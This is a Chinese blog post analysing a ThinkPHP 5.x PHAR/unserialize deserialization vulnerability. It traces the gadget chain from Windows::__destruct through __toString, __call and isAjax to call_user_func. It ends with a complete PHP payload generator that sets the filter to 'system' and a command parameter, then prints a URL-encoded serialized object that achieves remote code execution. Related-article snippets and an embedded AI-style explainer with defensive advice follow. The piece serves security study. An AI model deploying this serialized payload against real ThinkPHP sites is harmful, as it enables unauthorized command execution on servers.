全网最详细thinkPHP反序列化漏洞详解

最新推荐文章于 2025-09-03 12:35:37 发布
原创 最新推荐文章于 2025-09-03 12:35:37 发布 · 2.2k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php #服务器 #web安全

本文详细解析了ThinkPHP框架中的PHAR反序列化漏洞,通过跟踪魔术方法调用链,展示了如何从`__destruct()`开始,经过`__toString()`、`toJson()`、`toArray()`、`getData()`、`__call()`等一系列方法,最终可能导致代码执行。文中提到了payload构造的关键点,包括控制`hook`、`filter`参数以及`param`变量,揭示了通过`isAjax()`函数实现可控参数的途径。

三:ThinkPHP中的PHAR反序列化

  漏洞挖掘原理利用自动调用的魔术方法,一步一步去寻找调用链,寻找可控点,在unserialize和phar://触发

1.漏洞起点为/pipes/windows.php中的__destruct()中的 $this->removeFiles();

继续跟进它其中存在

if (file_exists($filename)) {

                @unlink($filename);

            }

,可以想到如果$filename为一个对象的话,而file_exists会将其变成字符串处理,从而触发————toString魔术方法。

2.全局搜索__toString,在Comversion.php中寻找到

public function __toString()

    {

        return $this->toJson();

    }

继续跟进tojson()

public function toJson($options = JSON_UNESCAPED_UNICODE)

    {

        return json_encode($this->toArray(), $options);

    }

跟进toARrray()

if (!empty($this->append)) {

            foreach ($this->append as $key => $name) {

                if (is_array($name)) {

                    // 追加关联对象属性

                    $relation = $this->getRelation($key);

                    if (!$relation) {

                        $relation = $this->getAttr($key);

                        $relation->visible($name);

                    }

跟进getArray()

 public function getAttr($name, &$item = null)

    {

        try {

            $notFound = false;

            $value    = $this->getData($name);

        } catch (InvalidArgumentException $e) {

            $notFound = true;

            $value    = null;

        }

跟进getData()

public function getData($name = null)

    {

        if (is_null($name)) {

            return $this->data;

        } elseif (array_key_exists($name, $this->data)) {

            return $this->data[$name];

        } elseif (array_key_exists($name, $this->relation)) {

            return $this->relation[$name];

        }

最后$relation=$this->data[$name],调用链基本完成,但没有执行点,这时想到$relation->visible($name);如果$relation这个类没有visible$name)这个方法则会调用__call魔术方法,可以尝试。

public function __call($method, $args)

    {

        if (array_key_exists($method, $this->hook)) {

            array_unshift($args, $this);

            return call_user_func_array($this->hook[$method], $args);

        }

        throw new Exception('method not exists:' . static::class . '->' . $method);

    }

$this->hook可控,但是array_unshift($args, $this);会在数组前插入新的元素,很难构建payload,既然这个方法无法利用call_user_func_array($this->hook[$method], $args),那为啥不直接用call_user_func_array($this->hook[$method], $args)调用本类存在的方法了。

假设this->hook[‘visible’=>[$this,method]]

那么call_user_func_array($this->hook[$method], $args)就会时

call_user_func_array([$this,method], $args)从而继续进行下去

继续寻找call_user_func()找到

private function filterValue(&$value, $key, $filters)

    {

        $default = array_pop($filters);

        foreach ($filters as $filter) {

            if (is_callable($filter)) {

                // 调用函数或者方法过滤

                $value = call_user_func($filter, $value);

发现$filters参数那么谁在调用filterValue()呢,发现cookie()再继续调用

其中

        $filter = $this->getFilter($filter, $default);

 

跟进getFilter(),发现

 $filter = $filter ?: $this->filter;

其中将$filter = (array) $filter;变成了一个数组

最终call_user_func($filter, $value);第一个参数可控,寻找第二个参数$value

找到input函数,继续寻找谁在调用input,发现params函数在调用而且

 return $this->input($this->param, $name, $default, $filter);

其中$this->param可控所以第二个参数值可控

filterValue(&$value, $key, $filters)->

public function input($data = [], $name = '', $default = null, $filter = ''){

$this->filterValue($data, $name, $filter);}->
public function param($name = '', $default = null, $filter = '')

{ return $this->input($this->param, $name, $default, $filter);}

但如果想进行到这一步$name不能为空因为在input()函数中存在

if (false === $name) {

            // 获取原始数据

            return $data;

        }

所以我们要给$name赋值,最终寻找到isAjax()函数

public function isAjax($ajax = false)

 {

 $result= $this->param($this->config['var_ajax']) ? true : $result;

        return $result;

    }

isAjax函数中,我们可以控制$this->config['var_ajax']$this->config['var_ajax']可控就意味着param函数中的$name可控。param函数中的$name可控就意味着input函数中的$name可控。

根据调用链尝试构建payload

namespace think;

class Request

{

    protected $hook = [];

    protected $config = [];

    protected $filter;

    protected $param = [];

    public function __construct(){

        $this->filter = 'system';                       // 要调用的函数

        $this->param = ['ifconfig'];                    // 要执行的命令

        $this->hook = ['visible'=>[$this, 'isAjax']];   // 要在__call中调用的方法

        $this->config = ['var_ajax' => ''];             // 配置参数,可控点

    }

}

abstract class Model{

    protected $append = [];     // 参考Converstion类的相同定义

    private $data = [];         // 参数Attribute类的相同定义

    function __construct()      // 给两个属性赋值

    {

        $this->append = ['woniu' => ['a']];  // 截止目前append只需要满足不为空,所以任意定义, Conversion 166

        $this->data = ['woniu' => new Request() ]; // 此处data的定义要绕一些,因为存在多个调用

    }

}

namespace think\model;

use think\Model;

class Pivot extends Model {

   

}

namespace think\process\pipes;

use think\model\Pivot;

class Pipes {}

class Windows extends Pipes{

    private $files = ['/opt/lampp/htdocs/security/upload/test.php'];

    function __construct() {

        $this->files = [new Pivot()];

    }

}

$w = new Windows();

echo urlencode(serialize($w));

漏洞复现】CVE-2024-44902 Thinkphp反序列化漏洞
渗透之路,攻防之间皆学问
09-23 5734
Thinkphp v6.1.3至v8.0.4版本中存在反序列化漏洞,攻击者可利用此漏洞执行任意代码。
ThinkPHP反序列化漏洞
2303_77642110的博客
05-18 792
中,$value来源于filterValue中的&$value,而cookie方法中调用filterValue时,传入的参数为$data,所以终value的值来源于data,而在cookie方法中data不可控,所以排除了,很多人这里没想明白,我们接下来看input方法中的调用,还是继续探究$filter的值来源。wakeup两个反序列化一定会触发的魔术方法,wakeup需要进行反序列化时调用,所以先不考虑,搜索destruct,一共四个结果,而能利用的只有Windows.php
【vulhub】thinkphp漏洞系列
最新发布
2401_86835152的博客
09-03 660
通过 get、header、cookie 等位置传入参数实现目录穿越和文件包含,从而利用 pearcmd 文件包含实现远程命令执行通过构造特定的 URL,可以实现目录穿越和文件包含,然后利用 pearcmd 文件包含实现远程命令执行。具体来说,该框架在使用preg_replace的/e模式匹配路由时,未对用户输入参数进行充分过滤,导致输入参数被直接插入双引号中执行,从而引发任意代码执行漏洞。模式进行正则匹配,用户输入的参数可能被直接注入到代码执行上下文中,导致攻击者可构造恶意输入执行任意代码。
详细分析】thinkphp反序列化漏洞
记录学习,一起进步
06-26 1871
详细分析】thinkphp反序列化漏洞
ThinkPHP v6.0.8 CacheStore 反序列化漏洞
errorr0
08-03 3218
thinkphp6 漏洞
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 1052
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
Thinkphp6 反序列化漏洞分析
无问社区的博客
08-22 2155
小编对Thinkphp6 反序列化漏洞的分析和自己的总结,全篇有点长,可以互相交流一下
Thinkphp6.0.x反序列化漏洞复现
shinygod的博客
11-20 2697
Thinkphp6.0.x反序列化漏洞复现
thinkphp8反序列化分析
2301_79724395的博客
08-12 1210
摆了一个暑假,正好看见周会有人分析了tp反序列化,想起这条链子的发现者就是我尊敬的nivia,这不得好好分析一下,而且师傅也是分析了这个,所以有了这个文章。
thinkPHP3.2.3反序列化漏洞
qq_50589021的博客
10-10 1650
前言 ThinkPHP v3.2.* (SQL注入&文件读取)反序列化POP链 利用链: __destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()-> 搭建: 路径:/Application/Home/Controller/IndexController.class.php public fu
ThinkPHP 5.1.X 反序列化漏洞:深入分析与利用技巧
weixin_43822401的博客
06-16 905
Web应用开发中,框架的安全性至关重要。ThinkPHP作为广泛使用的PHP开发框架,其版本5.1.X中存在一个反序列化漏洞,允许攻击者执行任意代码。本文将深入分析该漏洞的原理、利用方法,并提供相应的防护措施。
ThinkPHP V6.0反序列化漏洞复现
WDWAGAAFGAGDADSA的博客
12-11 4834
TP6反序列化漏洞复现
代码审计-thinkphp 反序列化引起rce漏洞
gj204106的博客
10-09 796
目前的pop链:__destruct()->removefile()->file_exists()->__toString()->toJson()->toArray()->__call()->call_user_func_array()由上图代码可知,要满足date为数组,filter = $this->getFilter($filter, $default),发现filterValue()方法在input()方法里面,所以再跟踪谁调用了input()方法。此漏洞需要成品有涉及到反序列化
ThinkPHP反序列化漏洞分析一(后续已发)
没有网络安全就没有国家安全
03-06 1380
ThinkPHP反序列化漏洞分析一(后续已发)
ThinkPHP v6.0.x 反序列化
Lethe's Blog
04-27 3710
0x01 环境搭建 使用composer进行安装: composer create-project topthink/think=6.0.x-dev TPv6.0 cd TPv6.0 php think run 定义入口文件app\controller\Index.php: <?php namespace app\controller; use app\BaseController; ...
thinkphp5.0.24反序列化漏洞分析
热门推荐
Sk1y的博客
06-22 1万+
thinkphp5.0.24 反序列化漏洞分析 thinkphp5框架:thinkphp5的入口文件在,访问 写一个反序列化入口点全局搜索函数中的函数,调用了removeFiles()跟进removeFiles(),第163行的file_exists可以触发方法全局搜索在的第2265行,发现其调用了跟进,发现其调用了toArray()方法(在Model.php中)跟进,发现其有三处可以调用方法(就是整一个可以控制的类对象,然后让其调用该类不存在的方法,然后触发魔术方法)着重看第三处,...
ThinkPHP反序列化漏洞分析二
没有网络安全就没有国家安全
03-06 948
ThinkPHP反序列化漏洞分析二
thinkphp漏洞_漏洞分析之thinkPHP反序列化:这就是黑客的世界吗
weixin_39715997的博客
11-21 431
前言作为一个Web菜鸡,我之前和师傅们参加了红帽杯,奈何只有0输出,当时只知道是thinkphp5.2的反序列化漏洞,但是感觉时间不够了,也就没有继续做下去。只有赛后来查漏补缺了,也借着tp5.2这个反序列化pop链来学习下大佬们的构造思路,不得不说这个pop链真的是很强了,在分析的过程中,妈妈一直问我为什么跪着玩电脑~红帽杯2019 Ticket_System思路在直接输入xml数据处存在xxe...
Thinkphp反序列化漏洞原理
03-10
<think>嗯,我现在要理解ThinkPHP反序列化漏洞原理。首先,我需要回忆一下反序列化漏洞的一般概念。反序列化漏洞通常出现在应用程序将不可信的数据进行反序列化时,攻击者通过构造恶意序列化数据,在反序列化过程中触发代码执行或其他恶意行为。那ThinkPHP的这类漏洞具体是怎么发生的呢? 记得之前学过PHP反序列化,可能涉及到魔术方法,比如__destruct、__wakeup这些,当对象被销毁或者反序列化的时候会自动调用。如果这些方法中有危险的操作,比如调用其他方法或执行系统命令,就可能被利用。 接下来,我应该看看ThinkPHP框架中有哪些类可能包含这样的魔术方法。例如,可能存在某个类在反序列化时会执行文件操作、命令执行或者动态调用方法。攻击者可能构造一个恶意的对象,当这个对象被反序列化时,会自动调用这些魔术方法,进而执行恶意代码。 然后,ThinkPHP的某些版本可能存在链式调用,也就是利用多个类的组合来达到攻击效果。例如,一个类的方法调用另一个类的方法,形成一条调用链,终执行危险操作。这种称为POP链(Property-Oriented Programming)。 另外,反序列化的入口点也很重要。应用程序可能在处理用户输入的时候,比如接收Cookie、表单数据或者其他输入时,没有进行过滤就直接反序列化数据,导致攻击者可以注入恶意序列化字符串。 例如,如果ThinkPHP在处理某个参数时使用了unserialize()函数,而参数值用户可控,那么攻击者可以构造恶意数据传入,触发反序列化漏洞。 具体到ThinkPHP漏洞案例,比如之前的某个版本,可能存在某个类在反序列化时,__destruct方法中调用了某个文件删除或者写入的方法,或者动态加载了某个模块,导致攻击者可以控制文件路径或命令,从而进行文件上传、远程代码执行等。 比如,假设有一个类A,其__destruct方法中调用了某个文件操作函数,参数是类的一个属性。攻击者构造一个类A的对象,设置该属性为恶意路径,当对象被反序列化后,销毁时触发__destruct,执行了恶意操作。 或者,某个类B的__wakeup方法中使用了call_user_func或类似的动态函数调用,而调用的函数和参数由类属性控制,攻击者可以构造这些属性来执行任意函数。 再比如,利用ThinkPHP中的模型类、缓存类或者日志类,这些类可能在反序列化时进行某些危险操作。例如,缓存类反序列化时可能写入文件,如果文件名和内容可控,就可能写入webshell。 此外,还需要考虑框架中存在的一些可以利用的链,比如使用Pivot类或者其他内置类,通过链式调用达到命令执行的效果。 总结一下,ThinkPHP反序列化漏洞的原理可能包括以下几个步骤: 1. 存在反序列化入口:应用程序某个地方对用户输入的数据进行了反序列化操作,且未进行充分过滤。 2. 存在可利用的类:框架中的某些类定义了危险的魔术方法,或者在方法中有不安全的使用方式。 3. 构造POP链:攻击者通过组合多个类的属性和方法调用,形成一条能够执行恶意操作的链。 4. 触发恶意代码:当恶意序列化数据被反序列化时,自动调用魔术方法,执行攻击者预设的操作,如文件写入、命令执行等。 为了验证是否正确,我需要查阅一些已知的ThinkPHP反序列化漏洞案例,看看它们的利用方式是否符合上述思路。比如,ThinkPHP 5.x版本中的反序列化漏洞,可能涉及到的类如Windows、Pivot等,通过链式调用终执行任意代码。 例如,某个漏洞利用链可能开始于某个类的__destruct方法,该方法调用了一个文件处理方法,接着另一个类的方法可能通过参数注入导致命令执行。攻击者需要精心构造这些类的属性,使得在反序列化过程中,这些方法被依次调用,并传递恶意参数。 另外,框架中如果使用了可以操作外部资源的类,比如数据库连接、缓存处理等,也可能成为攻击目标。比如,数据库连接类在反序列化时可能根据属性值连接指定的数据库,如果该属性被控制,可能导致SSRF或其他攻击。 总之,理解ThinkPHP反序列化漏洞需要结合PHP反序列化的基本机制,分析框架中特定类的实现,找到可利用的魔术方法和POP链,以及应用程序中处理用户输入的反序列化入口点。通过这些环节的组合,攻击者能够实现远程代码执行等攻击效果。</think>ThinkPHP反序列化漏洞原理分析如下: --- ### 一、核心概念 1. **反序列化漏洞** 当应用程序将用户可控的序列化数据还原为对象时,若未充分验证数据安全性,攻击者可构造恶意数据触发代码执行。 2. **PHP反序列化机制** PHP的`unserialize()`函数将字符串还原为对象,并自动调用魔术方法(如`__destruct`, `__wakeup`),这些方法若包含危险操作则可能被利用。 --- ### 二、漏洞触发条件 1. **存在反序列化入口** 应用程序直接反序列化用户输入(如Cookie、参数等),例如: ```php $data = unserialize($_GET['data']); // 用户可控的输入 ``` 2. **存在可利用的类** ThinkPHP框架中存在包含危险魔术方法或方法的类,例如: - `__destruct()`:对象销毁时自动调用。 - `__wakeup()`:反序列化时自动调用。 - 动态方法调用(如`call_user_func`)或文件操作函数。 --- ### 三、典型漏洞链(POP链)示例 以下以ThinkPHP 5.x反序列化漏洞为例说明攻击链: #### 1. **入口类:触发魔术方法** 假设存在类`A`,其`__destruct()`方法调用某个文件操作: ```php class A { public $file; public function __destruct() { file_put_contents($this->file, 'data'); // 危险操作! } } ``` 攻击者可控制`$file`属性写入Webshell。 #### 2. **链式调用:组合多个类** 利用框架内部类构造链式调用: - **类B**:通过`__toString()`方法触发其他方法。 - **类C**:通过动态方法调用执行系统命令。 ```php class C { public $cmd; public function exec() { system($this->cmd); // 执行任意命令 } } ``` #### 3. **完整攻击链** 攻击者构造序列化数据: - 创建类`A`对象,设置`$file`为Webshell路径。 - 通过属性注入链接类`B`和`C`,终触发命令执行。 --- ### 四、漏洞利用步骤 1. **定位反序列化入口** 找到接收用户输入并调用`unserialize()`的位置(如缓存、Session处理)。 2. **分析框架类** 寻找包含魔术方法或危险操作的类,例如: - `think\Cache`:缓存操作可能涉及文件写入。 - `think\process\pipes\Windows`:管道处理可能执行命令。 3. **构造POP链** 组合多个类的属性和方法,形成从反序列化到代码执行的完整调用链。 4. **生成Payload** 序列化恶意对象并发送给目标,触发漏洞。 --- ### 五、防御措施 1. **避免反序列化用户输入** 使用JSON等安全格式替代序列化数据。 2. **限制魔术方法** 避免在`__destruct`、`__wakeup`中执行敏感操作。 3. **更新框架版本** 及时修复已知漏洞(如ThinkPHP 5.0.24+修复了部分反序列化问题)。 4. **输入过滤** 若必须反序列化,需严格校验数据来源和内容。 --- ### 六、案例分析 **漏洞编号**:CVE-XXXX-XXXX(示例) **影响版本**:ThinkPHP 5.x **利用链**: 1. 通过`think\process\pipes\Windows`类的`__destruct`方法触发文件删除。 2. 结合`think\model\Pivot`类的`__toString`方法动态调用危险函数。 --- ### 总结 ThinkPHP反序列化漏洞本质是框架内部类在反序列化时触发危险操作,攻击者通过构造恶意对象链实现代码执行。防御需结合安全编码和框架升级。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

不要做小白了

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值